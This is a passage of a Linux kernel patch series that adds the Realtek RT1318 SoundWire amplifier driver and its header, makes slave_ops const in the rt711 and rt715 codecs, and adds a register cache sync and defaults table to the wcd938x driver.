++	{ "FB Data", NULL, "FB Gen" },
++	{ "DP2TX", NULL, "FB Data" },
++};
++
++static int rt1318_set_sdw_stream(struct snd_soc_dai *dai, void *sdw_stream,
++				int direction)
++{
++	struct sdw_stream_data *stream;
++
++	if (!sdw_stream)
++		return 0;
++
++	stream = kzalloc(sizeof(*stream), GFP_KERNEL);
++	if (!stream)
++		return -ENOMEM;
++
++	stream->sdw_stream = sdw_stream;
++
++	/* Use tx_mask or rx_mask to configure stream tag and set dma_data */
++	if (direction == SNDRV_PCM_STREAM_PLAYBACK)
++		dai->playback_dma_data = stream;
++	else
++		dai->capture_dma_data = stream;
++
++	return 0;
++}
++
++static void rt1318_sdw_shutdown(struct snd_pcm_substream *substream,
++				struct snd_soc_dai *dai)
++{
++	struct sdw_stream_data *stream;
++
++	stream = snd_soc_dai_get_dma_data(dai, substream);
++	snd_soc_dai_set_dma_data(dai, substream, NULL);
++	kfree(stream);
++}
++
++static int rt1318_sdw_hw_params(struct snd_pcm_substream *substream,
++	struct snd_pcm_hw_params *params, struct snd_soc_dai *dai)
++{
++	struct snd_soc_component *component = dai->component;
++	struct rt1318_sdw_priv *rt1318 =
++		snd_soc_component_get_drvdata(component);
++	struct sdw_stream_config stream_config;
++	struct sdw_port_config port_config;
++	enum sdw_data_direction direction;
++	struct sdw_stream_data *stream;
++	int retval, port, num_channels, ch_mask;
++	unsigned int sampling_rate;
++
++	dev_dbg(dai->dev, "%s %s", __func__, dai->name);
++	stream = snd_soc_dai_get_dma_data(dai, substream);
++
++	if (!stream)
++		return -EINVAL;
++
++	if (!rt1318->sdw_slave)
++		return -EINVAL;
++
++	/* SoundWire specific configuration */
++	/* port 1 for playback */
++	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
++		direction = SDW_DATA_DIR_RX;
++		port = 1;
++	} else {
++		direction = SDW_DATA_DIR_TX;
++		port = 2;
++	}
++
++	num_channels = params_channels(params);
++	ch_mask = (1 << num_channels) - 1;
++
++	stream_config.frame_rate = params_rate(params);
++	stream_config.ch_count = num_channels;
++	stream_config.bps = snd_pcm_format_width(params_format(params));
++	stream_config.direction = direction;
++
++	port_config.ch_mask = ch_mask;
++	port_config.num = port;
++
++	retval = sdw_stream_add_slave(rt1318->sdw_slave, &stream_config,
++				&port_config, 1, stream->sdw_stream);
++	if (retval) {
++		dev_err(dai->dev, "Unable to configure port\n");
++		return retval;
++	}
++
++	/* sampling rate configuration */
++	switch (params_rate(params)) {
++	case 16000:
++		sampling_rate = RT1318_SDCA_RATE_16000HZ;
++		break;
++	case 32000:
++		sampling_rate = RT1318_SDCA_RATE_32000HZ;
++		break;
++	case 44100:
++		sampling_rate = RT1318_SDCA_RATE_44100HZ;
++		break;
++	case 48000:
++		sampling_rate = RT1318_SDCA_RATE_48000HZ;
++		break;
++	case 96000:
++		sampling_rate = RT1318_SDCA_RATE_96000HZ;
++		break;
++	case 192000:
++		sampling_rate = RT1318_SDCA_RATE_192000HZ;
++		break;
++	default:
++		dev_err(component->dev, "Rate %d is not supported\n",
++			params_rate(params));
++		return -EINVAL;
++	}
++
++	/* set sampling frequency */
++	regmap_write(rt1318->regmap,
++		SDW_SDCA_CTL(FUNC_NUM_SMART_AMP, RT1318_SDCA_ENT_CS21, RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX, 0),
++		sampling_rate);
++
++	return 0;
++}
++
++static int rt1318_sdw_pcm_hw_free(struct snd_pcm_substream *substream,
++				struct snd_soc_dai *dai)
++{
++	struct snd_soc_component *component = dai->component;
++	struct rt1318_sdw_priv *rt1318 =
++		snd_soc_component_get_drvdata(component);
++	struct sdw_stream_data *stream =
++		snd_soc_dai_get_dma_data(dai, substream);
++
++	if (!rt1318->sdw_slave)
++		return -EINVAL;
++
++	sdw_stream_remove_slave(rt1318->sdw_slave, stream->sdw_stream);
++	return 0;
++}
++
++/*
++ * slave_ops: callbacks for get_clock_stop_mode, clock_stop and
++ * port_prep are not defined for now
++ */
++static const struct sdw_slave_ops rt1318_slave_ops = {
++	.read_prop = rt1318_read_prop,
++	.update_status = rt1318_update_status,
++};
++
++static int rt1318_sdw_component_probe(struct snd_soc_component *component)
++{
++	int ret;
++	struct rt1318_sdw_priv *rt1318 = snd_soc_component_get_drvdata(component);
++
++	rt1318->component = component;
++
++	ret = pm_runtime_resume(component->dev);
++	dev_dbg(&rt1318->sdw_slave->dev, "%s pm_runtime_resume, ret=%d", __func__, ret);
++	if (ret < 0 && ret != -EACCES)
++		return ret;
++
++	return 0;
++}
++
++static const struct snd_soc_component_driver soc_component_sdw_rt1318 = {
++	.probe = rt1318_sdw_component_probe,
++	.controls = rt1318_snd_controls,
++	.num_controls = ARRAY_SIZE(rt1318_snd_controls),
++	.dapm_widgets = rt1318_dapm_widgets,
++	.num_dapm_widgets = ARRAY_SIZE(rt1318_dapm_widgets),
++	.dapm_routes = rt1318_dapm_routes,
++	.num_dapm_routes = ARRAY_SIZE(rt1318_dapm_routes),
++	.endianness = 1,
++};
++
++static const struct snd_soc_dai_ops rt1318_aif_dai_ops = {
++	.hw_params = rt1318_sdw_hw_params,
++	.hw_free	= rt1318_sdw_pcm_hw_free,
++	.set_stream	= rt1318_set_sdw_stream,
++	.shutdown	= rt1318_sdw_shutdown,
++};
++
++#define RT1318_STEREO_RATES (SNDRV_PCM_RATE_16000 | SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_44100 | \
++	SNDRV_PCM_RATE_48000 | SNDRV_PCM_RATE_96000 | SNDRV_PCM_RATE_192000)
++#define RT1318_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE | \
++	SNDRV_PCM_FMTBIT_S32_LE)
++
++static struct snd_soc_dai_driver rt1318_sdw_dai[] = {
++	{
++		.name = "rt1318-aif",
++		.playback = {
++			.stream_name = "DP1 Playback",
++			.channels_min = 1,
++			.channels_max = 2,
++			.rates = RT1318_STEREO_RATES,
++			.formats = RT1318_FORMATS,
++		},
++		.capture = {
++			.stream_name = "DP2 Capture",
++			.channels_min = 1,
++			.channels_max = 2,
++			.rates = RT1318_STEREO_RATES,
++			.formats = RT1318_FORMATS,
++		},
++		.ops = &rt1318_aif_dai_ops,
++	},
++};
++
++static int rt1318_sdw_init(struct device *dev, struct regmap *regmap,
++				struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318;
++	int ret;
++
++	rt1318 = devm_kzalloc(dev, sizeof(*rt1318), GFP_KERNEL);
++	if (!rt1318)
++		return -ENOMEM;
++
++	dev_set_drvdata(dev, rt1318);
++	rt1318->sdw_slave = slave;
++	rt1318->regmap = regmap;
++
++	/*
++	 * Mark hw_init to false
++	 * HW init will be performed when device reports present
++	 */
++	rt1318->hw_init = false;
++	rt1318->first_hw_init = false;
++
++	ret =  devm_snd_soc_register_component(dev,
++				&soc_component_sdw_rt1318,
++				rt1318_sdw_dai,
++				ARRAY_SIZE(rt1318_sdw_dai));
++
++	dev_dbg(&slave->dev, "%s\n", __func__);
++
++	return ret;
++}
++
++static int rt1318_sdw_probe(struct sdw_slave *slave,
++				const struct sdw_device_id *id)
++{
++	struct regmap *regmap;
++
++	/* Regmap Initialization */
++	regmap = devm_regmap_init_sdw(slave, &rt1318_sdw_regmap);
++	if (IS_ERR(regmap))
++		return PTR_ERR(regmap);
++
++	return rt1318_sdw_init(&slave->dev, regmap, slave);
++}
++
++static int rt1318_sdw_remove(struct sdw_slave *slave)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(&slave->dev);
++
++	if (rt1318->first_hw_init)
++		pm_runtime_disable(&slave->dev);
++
++	return 0;
++}
++
++static const struct sdw_device_id rt1318_id[] = {
++	SDW_SLAVE_ENTRY_EXT(0x025d, 0x1318, 0x3, 0x1, 0),
++	{},
++};
++MODULE_DEVICE_TABLE(sdw, rt1318_id);
++
++static int __maybe_unused rt1318_dev_suspend(struct device *dev)
++{
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++
++	if (!rt1318->hw_init)
++		return 0;
++
++	regcache_cache_only(rt1318->regmap, true);
++	return 0;
++}
++
++#define RT1318_PROBE_TIMEOUT 5000
++
++static int __maybe_unused rt1318_dev_resume(struct device *dev)
++{
++	struct sdw_slave *slave = dev_to_sdw_dev(dev);
++	struct rt1318_sdw_priv *rt1318 = dev_get_drvdata(dev);
++	unsigned long time;
++
++	if (!rt1318->first_hw_init)
++		return 0;
++
++	if (!slave->unattach_request)
++		goto regmap_sync;
++
++	time = wait_for_completion_timeout(&slave->initialization_complete,
++				msecs_to_jiffies(RT1318_PROBE_TIMEOUT));
++	if (!time) {
++		dev_err(&slave->dev, "Initialization not complete, timed out\n");
++		return -ETIMEDOUT;
++	}
++
++regmap_sync:
++	slave->unattach_request = 0;
++	regcache_cache_only(rt1318->regmap, false);
++	regcache_sync(rt1318->regmap);
++
++	return 0;
++}
++
++static const struct dev_pm_ops rt1318_pm = {
++	SET_SYSTEM_SLEEP_PM_OPS(rt1318_dev_suspend, rt1318_dev_resume)
++	SET_RUNTIME_PM_OPS(rt1318_dev_suspend, rt1318_dev_resume, NULL)
++};
++
++static struct sdw_driver rt1318_sdw_driver = {
++	.driver = {
++		.name = "rt1318-sdca",
++		.owner = THIS_MODULE,
++		.pm = &rt1318_pm,
++	},
++	.probe = rt1318_sdw_probe,
++	.remove = rt1318_sdw_remove,
++	.ops = &rt1318_slave_ops,
++	.id_table = rt1318_id,
++};
++module_sdw_driver(rt1318_sdw_driver);
++
++MODULE_DESCRIPTION("ASoC RT1318 driver SDCA SDW");
++MODULE_AUTHOR("Shuming Fan <shumingf@realtek.com>");
++MODULE_LICENSE("GPL");
+diff --git a/sound/soc/codecs/rt1318-sdw.h b/sound/soc/codecs/rt1318-sdw.h
+new file mode 100644
+index 0000000000000..4d7ac9c4bd8de
+--- /dev/null
++++ b/sound/soc/codecs/rt1318-sdw.h
+@@ -0,0 +1,101 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++/*
++ * rt1318-sdw.h -- RT1318 SDCA ALSA SoC audio driver header
++ *
++ * Copyright(c) 2022 Realtek Semiconductor Corp.
++ */
++
++#ifndef __RT1318_SDW_H__
++#define __RT1318_SDW_H__
++
++#include <linux/regmap.h>
++#include <linux/soundwire/sdw.h>
++#include <linux/soundwire/sdw_type.h>
++#include <linux/soundwire/sdw_registers.h>
++#include <sound/soc.h>
++
++/* imp-defined registers */
++#define RT1318_SAPU_SM 0x3203
++
++#define R1318_TCON	0xc203
++#define R1318_TCON_RELATED_1	0xc206
++
++#define R1318_SPK_TEMPERATRUE_PROTECTION_0	0xdb00
++#define R1318_SPK_TEMPERATRUE_PROTECTION_L_4	0xdb08
++#define R1318_SPK_TEMPERATRUE_PROTECTION_R_4	0xdd08
++
++#define R1318_SPK_TEMPERATRUE_PROTECTION_L_6	0xdb12
++#define R1318_SPK_TEMPERATRUE_PROTECTION_R_6	0xdd12
++
++#define RT1318_INIT_RECIPROCAL_REG_L_24		0xdbb5
++#define RT1318_INIT_RECIPROCAL_REG_L_23_16	0xdbb6
++#define RT1318_INIT_RECIPROCAL_REG_L_15_8	0xdbb7
++#define RT1318_INIT_RECIPROCAL_REG_L_7_0	0xdbb8
++#define RT1318_INIT_RECIPROCAL_REG_R_24		0xddb5
++#define RT1318_INIT_RECIPROCAL_REG_R_23_16	0xddb6
++#define RT1318_INIT_RECIPROCAL_REG_R_15_8	0xddb7
++#define RT1318_INIT_RECIPROCAL_REG_R_7_0	0xddb8
++
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_24 0xdbc5
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_23_16 0xdbc6
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_15_8 0xdbc7
++#define RT1318_INIT_R0_RECIPROCAL_SYN_L_7_0 0xdbc8
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_24 0xddc5
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_23_16 0xddc6
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_15_8 0xddc7
++#define RT1318_INIT_R0_RECIPROCAL_SYN_R_7_0 0xddc8
++
++#define RT1318_R0_COMPARE_FLAG_L	0xdb35
++#define RT1318_R0_COMPARE_FLAG_R	0xdd35
++
++#define RT1318_STP_INITIAL_RS_TEMP_H 0xdd93
++#define RT1318_STP_INITIAL_RS_TEMP_L 0xdd94
++
++/* RT1318 SDCA Control - function number */
++#define FUNC_NUM_SMART_AMP 0x04
++
++/* RT1318 SDCA entity */
++#define RT1318_SDCA_ENT_PDE23 0x31
++#define RT1318_SDCA_ENT_XU24 0x24
++#define RT1318_SDCA_ENT_FU21 0x03
++#define RT1318_SDCA_ENT_UDMPU21 0x02
++#define RT1318_SDCA_ENT_CS21 0x21
++#define RT1318_SDCA_ENT_SAPU 0x29
++
++/* RT1318 SDCA control */
++#define RT1318_SDCA_CTL_SAMPLE_FREQ_INDEX 0x10
++#define RT1318_SDCA_CTL_REQ_POWER_STATE 0x01
++#define RT1318_SDCA_CTL_FU_MUTE 0x01
++#define RT1318_SDCA_CTL_FU_VOLUME 0x02
++#define RT1318_SDCA_CTL_UDMPU_CLUSTER 0x10
++#define RT1318_SDCA_CTL_SAPU_PROTECTION_MODE 0x10
++#define RT1318_SDCA_CTL_SAPU_PROTECTION_STATUS 0x11
++
++/* RT1318 SDCA channel */
++#define CH_L 0x01
++#define CH_R 0x02
++
++/* sample frequency index */
++#define RT1318_SDCA_RATE_16000HZ		0x04
++#define RT1318_SDCA_RATE_32000HZ		0x07
++#define RT1318_SDCA_RATE_44100HZ		0x08
++#define RT1318_SDCA_RATE_48000HZ		0x09
++#define RT1318_SDCA_RATE_96000HZ		0x0b
++#define RT1318_SDCA_RATE_192000HZ		0x0d
++
++
++struct rt1318_sdw_priv {
++	struct snd_soc_component *component;
++	struct regmap *regmap;
++	struct sdw_slave *sdw_slave;
++	enum sdw_slave_status status;
++	struct sdw_bus_params params;
++	bool hw_init;
++	bool first_hw_init;
++};
++
++struct sdw_stream_data {
++	struct sdw_stream_runtime *sdw_stream;
++};
++
++#endif /* __RT1318_SDW_H__ */
+diff --git a/sound/soc/codecs/rt711-sdca-sdw.c b/sound/soc/codecs/rt711-sdca-sdw.c
+index 88a8392a58edb..e23cec4c457de 100644
+--- a/sound/soc/codecs/rt711-sdca-sdw.c
++++ b/sound/soc/codecs/rt711-sdca-sdw.c
+@@ -338,7 +338,7 @@ io_error:
+ 	return ret;
+ }
+ 
+-static struct sdw_slave_ops rt711_sdca_slave_ops = {
++static const struct sdw_slave_ops rt711_sdca_slave_ops = {
+ 	.read_prop = rt711_sdca_read_prop,
+ 	.interrupt_callback = rt711_sdca_interrupt_callback,
+ 	.update_status = rt711_sdca_update_status,
+diff --git a/sound/soc/codecs/rt715-sdca-sdw.c b/sound/soc/codecs/rt715-sdca-sdw.c
+index c54ecf3e69879..38a82e4e2f952 100644
+--- a/sound/soc/codecs/rt715-sdca-sdw.c
++++ b/sound/soc/codecs/rt715-sdca-sdw.c
+@@ -172,7 +172,7 @@ static int rt715_sdca_read_prop(struct sdw_slave *slave)
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops rt715_sdca_slave_ops = {
++static const struct sdw_slave_ops rt715_sdca_slave_ops = {
+ 	.read_prop = rt715_sdca_read_prop,
+ 	.update_status = rt715_sdca_update_status,
+ };
+diff --git a/sound/soc/codecs/wcd938x-sdw.c b/sound/soc/codecs/wcd938x-sdw.c
+index 1bf3c06a2b622..402286dfaea44 100644
+--- a/sound/soc/codecs/wcd938x-sdw.c
++++ b/sound/soc/codecs/wcd938x-sdw.c
+@@ -161,6 +161,14 @@ EXPORT_SYMBOL_GPL(wcd938x_sdw_set_sdw_stream);
+ static int wcd9380_update_status(struct sdw_slave *slave,
+ 				 enum sdw_slave_status status)
+ {
++	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
++
++	if (wcd->regmap && (status == SDW_SLAVE_ATTACHED)) {
++		/* Write out any cached changes that happened between probe and attach */
++		regcache_cache_only(wcd->regmap, false);
++		return regcache_sync(wcd->regmap);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -177,21 +185,1015 @@ static int wcd9380_interrupt_callback(struct sdw_slave *slave,
+ {
+ 	struct wcd938x_sdw_priv *wcd = dev_get_drvdata(&slave->dev);
+ 	struct irq_domain *slave_irq = wcd->slave_irq;
+-	struct regmap *regmap = dev_get_regmap(&slave->dev, NULL);
+ 	u32 sts1, sts2, sts3;
+ 
+ 	do {
+ 		handle_nested_irq(irq_find_mapping(slave_irq, 0));
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
+-		regmap_read(regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_0, &sts1);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_1, &sts2);
++		regmap_read(wcd->regmap, WCD938X_DIGITAL_INTR_STATUS_2, &sts3);
+ 
+ 	} while (sts1 || sts2 || sts3);
+ 
+ 	return IRQ_HANDLED;
+ }
+ 
+-static struct sdw_slave_ops wcd9380_slave_ops = {
++static const struct reg_default wcd938x_defaults[] = {
++	{WCD938X_ANA_PAGE_REGISTER,                            0x00},
++	{WCD938X_ANA_BIAS,                                     0x00},
++	{WCD938X_ANA_RX_SUPPLIES,                              0x00},
++	{WCD938X_ANA_HPH,                                      0x0C},
++	{WCD938X_ANA_EAR,                                      0x00},
++	{WCD938X_ANA_EAR_COMPANDER_CTL,                        0x02},
++	{WCD938X_ANA_TX_CH1,                                   0x20},
++	{WCD938X_ANA_TX_CH2,                                   0x00},
++	{WCD938X_ANA_TX_CH3,                                   0x20},
++	{WCD938X_ANA_TX_CH4,                                   0x00},
++	{WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC,                 0x00},
++	{WCD938X_ANA_MICB3_DSP_EN_LOGIC,                       0x00},
++	{WCD938X_ANA_MBHC_MECH,                                0x39},
++	{WCD938X_ANA_MBHC_ELECT,                               0x08},
++	{WCD938X_ANA_MBHC_ZDET,                                0x00},
++	{WCD938X_ANA_MBHC_RESULT_1,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_2,                            0x00},
++	{WCD938X_ANA_MBHC_RESULT_3,                            0x00},
++	{WCD938X_ANA_MBHC_BTN0,                                0x00},
++	{WCD938X_ANA_MBHC_BTN1,                                0x10},
++	{WCD938X_ANA_MBHC_BTN2,                                0x20},
++	{WCD938X_ANA_MBHC_BTN3,                                0x30},
++	{WCD938X_ANA_MBHC_BTN4,                                0x40},
++	{WCD938X_ANA_MBHC_BTN5,                                0x50},
++	{WCD938X_ANA_MBHC_BTN6,                                0x60},
++	{WCD938X_ANA_MBHC_BTN7,                                0x70},
++	{WCD938X_ANA_MICB1,                                    0x10},
++	{WCD938X_ANA_MICB2,                                    0x10},
++	{WCD938X_ANA_MICB2_RAMP,                               0x00},
++	{WCD938X_ANA_MICB3,                                    0x10},
++	{WCD938X_ANA_MICB4,                                    0x10},
++	{WCD938X_BIAS_CTL,                                     0x2A},
++	{WCD938X_BIAS_VBG_FINE_ADJ,                            0x55},
++	{WCD938X_LDOL_VDDCX_ADJUST,                            0x01},
++	{WCD938X_LDOL_DISABLE_LDOL,                            0x00},
++	{WCD938X_MBHC_CTL_CLK,                                 0x00},
++	{WCD938X_MBHC_CTL_ANA,                                 0x00},
++	{WCD938X_MBHC_CTL_SPARE_1,                             0x00},
++	{WCD938X_MBHC_CTL_SPARE_2,                             0x00},
++	{WCD938X_MBHC_CTL_BCS,                                 0x00},
++	{WCD938X_MBHC_MOISTURE_DET_FSM_STATUS,                 0x00},
++	{WCD938X_MBHC_TEST_CTL,                                0x00},
++	{WCD938X_LDOH_MODE,                                    0x2B},
++	{WCD938X_LDOH_BIAS,                                    0x68},
++	{WCD938X_LDOH_STB_LOADS,                               0x00},
++	{WCD938X_LDOH_SLOWRAMP,                                0x50},
++	{WCD938X_MICB1_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB1_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB1_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB2_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB2_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB2_TEST_CTL_3,                             0x24},
++	{WCD938X_MICB3_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB3_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB3_TEST_CTL_3,                             0xA4},
++	{WCD938X_MICB4_TEST_CTL_1,                             0x1A},
++	{WCD938X_MICB4_TEST_CTL_2,                             0x00},
++	{WCD938X_MICB4_TEST_CTL_3,                             0xA4},
++	{WCD938X_TX_COM_ADC_VCM,                               0x39},
++	{WCD938X_TX_COM_BIAS_ATEST,                            0xE0},
++	{WCD938X_TX_COM_SPARE1,                                0x00},
++	{WCD938X_TX_COM_SPARE2,                                0x00},
++	{WCD938X_TX_COM_TXFE_DIV_CTL,                          0x22},
++	{WCD938X_TX_COM_TXFE_DIV_START,                        0x00},
++	{WCD938X_TX_COM_SPARE3,                                0x00},
++	{WCD938X_TX_COM_SPARE4,                                0x00},
++	{WCD938X_TX_1_2_TEST_EN,                               0xCC},
++	{WCD938X_TX_1_2_ADC_IB,                                0xE9},
++	{WCD938X_TX_1_2_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_1_2_TEST_CTL,                              0x38},
++	{WCD938X_TX_1_2_TEST_BLK_EN1,                          0xFF},
++	{WCD938X_TX_1_2_TXFE1_CLKDIV,                          0x00},
++	{WCD938X_TX_1_2_SAR2_ERR,                              0x00},
++	{WCD938X_TX_1_2_SAR1_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_EN,                               0xCC},
++	{WCD938X_TX_3_4_ADC_IB,                                0xE9},
++	{WCD938X_TX_3_4_ATEST_REFCTL,                          0x0A},
++	{WCD938X_TX_3_4_TEST_CTL,                              0x38},
++	{WCD938X_TX_3_4_TEST_BLK_EN3,                          0xFF},
++	{WCD938X_TX_3_4_TXFE3_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SAR4_ERR,                              0x00},
++	{WCD938X_TX_3_4_SAR3_ERR,                              0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN2,                          0xFB},
++	{WCD938X_TX_3_4_TXFE2_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE1,                                0x00},
++	{WCD938X_TX_3_4_TEST_BLK_EN4,                          0xFB},
++	{WCD938X_TX_3_4_TXFE4_CLKDIV,                          0x00},
++	{WCD938X_TX_3_4_SPARE2,                                0x00},
++	{WCD938X_CLASSH_MODE_1,                                0x40},
++	{WCD938X_CLASSH_MODE_2,                                0x3A},
++	{WCD938X_CLASSH_MODE_3,                                0x00},
++	{WCD938X_CLASSH_CTRL_VCL_1,                            0x70},
++	{WCD938X_CLASSH_CTRL_VCL_2,                            0x82},
++	{WCD938X_CLASSH_CTRL_CCL_1,                            0x31},
++	{WCD938X_CLASSH_CTRL_CCL_2,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_3,                            0x80},
++	{WCD938X_CLASSH_CTRL_CCL_4,                            0x51},
++	{WCD938X_CLASSH_CTRL_CCL_5,                            0x00},
++	{WCD938X_CLASSH_BUCK_TMUX_A_D,                         0x00},
++	{WCD938X_CLASSH_BUCK_SW_DRV_CNTL,                      0x77},
++	{WCD938X_CLASSH_SPARE,                                 0x00},
++	{WCD938X_FLYBACK_EN,                                   0x4E},
++	{WCD938X_FLYBACK_VNEG_CTRL_1,                          0x0B},
++	{WCD938X_FLYBACK_VNEG_CTRL_2,                          0x45},
++	{WCD938X_FLYBACK_VNEG_CTRL_3,                          0x74},
++	{WCD938X_FLYBACK_VNEG_CTRL_4,                          0x7F},
++	{WCD938X_FLYBACK_VNEG_CTRL_5,                          0x83},
++	{WCD938X_FLYBACK_VNEG_CTRL_6,                          0x98},
++	{WCD938X_FLYBACK_VNEG_CTRL_7,                          0xA9},
++	{WCD938X_FLYBACK_VNEG_CTRL_8,                          0x68},
++	{WCD938X_FLYBACK_VNEG_CTRL_9,                          0x64},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_1,                       0xED},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_2,                       0xF0},
++	{WCD938X_FLYBACK_VNEGDAC_CTRL_3,                       0xA6},
++	{WCD938X_FLYBACK_CTRL_1,                               0x65},
++	{WCD938X_FLYBACK_TEST_CTL,                             0x00},
++	{WCD938X_RX_AUX_SW_CTL,                                0x00},
++	{WCD938X_RX_PA_AUX_IN_CONN,                            0x01},
++	{WCD938X_RX_TIMER_DIV,                                 0x32},
++	{WCD938X_RX_OCP_CTL,                                   0x1F},
++	{WCD938X_RX_OCP_COUNT,                                 0x77},
++	{WCD938X_RX_BIAS_EAR_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_EAR_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_HPH_LDO,                              0xA9},
++	{WCD938X_RX_BIAS_HPH_PA,                               0xAA},
++	{WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2,                    0x8A},
++	{WCD938X_RX_BIAS_HPH_RDAC_LDO,                         0x88},
++	{WCD938X_RX_BIAS_HPH_CNP1,                             0x82},
++	{WCD938X_RX_BIAS_HPH_LOWPOWER,                         0x82},
++	{WCD938X_RX_BIAS_AUX_DAC,                              0xA0},
++	{WCD938X_RX_BIAS_AUX_AMP,                              0xAA},
++	{WCD938X_RX_BIAS_VNEGDAC_BLEEDER,                      0x50},
++	{WCD938X_RX_BIAS_MISC,                                 0x00},
++	{WCD938X_RX_BIAS_BUCK_RST,                             0x08},
++	{WCD938X_RX_BIAS_BUCK_VREF_ERRAMP,                     0x44},
++	{WCD938X_RX_BIAS_FLYB_ERRAMP,                          0x40},
++	{WCD938X_RX_BIAS_FLYB_BUFF,                            0xAA},
++	{WCD938X_RX_BIAS_FLYB_MID_RST,                         0x14},
++	{WCD938X_HPH_L_STATUS,                                 0x04},
++	{WCD938X_HPH_R_STATUS,                                 0x04},
++	{WCD938X_HPH_CNP_EN,                                   0x80},
++	{WCD938X_HPH_CNP_WG_CTL,                               0x9A},
++	{WCD938X_HPH_CNP_WG_TIME,                              0x14},
++	{WCD938X_HPH_OCP_CTL,                                  0x28},
++	{WCD938X_HPH_AUTO_CHOP,                                0x16},
++	{WCD938X_HPH_CHOP_CTL,                                 0x83},
++	{WCD938X_HPH_PA_CTL1,                                  0x46},
++	{WCD938X_HPH_PA_CTL2,                                  0x50},
++	{WCD938X_HPH_L_EN,                                     0x80},
++	{WCD938X_HPH_L_TEST,                                   0xE0},
++	{WCD938X_HPH_L_ATEST,                                  0x50},
++	{WCD938X_HPH_R_EN,                                     0x80},
++	{WCD938X_HPH_R_TEST,                                   0xE0},
++	{WCD938X_HPH_R_ATEST,                                  0x54},
++	{WCD938X_HPH_RDAC_CLK_CTL1,                            0x99},
++	{WCD938X_HPH_RDAC_CLK_CTL2,                            0x9B},
++	{WCD938X_HPH_RDAC_LDO_CTL,                             0x33},
++	{WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL,                     0x00},
++	{WCD938X_HPH_REFBUFF_UHQA_CTL,                         0x68},
++	{WCD938X_HPH_REFBUFF_LP_CTL,                           0x0E},
++	{WCD938X_HPH_L_DAC_CTL,                                0x20},
++	{WCD938X_HPH_R_DAC_CTL,                                0x20},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL,               0x55},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_EN,                     0x19},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1,                  0xA0},
++	{WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS,                 0x00},
++	{WCD938X_EAR_EAR_EN_REG,                               0x22},
++	{WCD938X_EAR_EAR_PA_CON,                               0x44},
++	{WCD938X_EAR_EAR_SP_CON,                               0xDB},
++	{WCD938X_EAR_EAR_DAC_CON,                              0x80},
++	{WCD938X_EAR_EAR_CNP_FSM_CON,                          0xB2},
++	{WCD938X_EAR_TEST_CTL,                                 0x00},
++	{WCD938X_EAR_STATUS_REG_1,                             0x00},
++	{WCD938X_EAR_STATUS_REG_2,                             0x08},
++	{WCD938X_ANA_NEW_PAGE_REGISTER,                        0x00},
++	{WCD938X_HPH_NEW_ANA_HPH2,                             0x00},
++	{WCD938X_HPH_NEW_ANA_HPH3,                             0x00},
++	{WCD938X_SLEEP_CTL,                                    0x16},
++	{WCD938X_SLEEP_WATCHDOG_CTL,                           0x00},
++	{WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL,                 0x00},
++	{WCD938X_MBHC_NEW_CTL_1,                               0x02},
++	{WCD938X_MBHC_NEW_CTL_2,                               0x05},
++	{WCD938X_MBHC_NEW_PLUG_DETECT_CTL,                     0xE9},
++	{WCD938X_MBHC_NEW_ZDET_ANA_CTL,                        0x0F},
++	{WCD938X_MBHC_NEW_ZDET_RAMP_CTL,                       0x00},
++	{WCD938X_MBHC_NEW_FSM_STATUS,                          0x00},
++	{WCD938X_MBHC_NEW_ADC_RESULT,                          0x00},
++	{WCD938X_TX_NEW_AMIC_MUX_CFG,                          0x00},
++	{WCD938X_AUX_AUXPA,                                    0x00},
++	{WCD938X_LDORXTX_MODE,                                 0x0C},
++	{WCD938X_LDORXTX_CONFIG,                               0x10},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_EN,                     0x00},
++	{WCD938X_DIE_CRACK_DIE_CRK_DET_OUT,                    0x00},
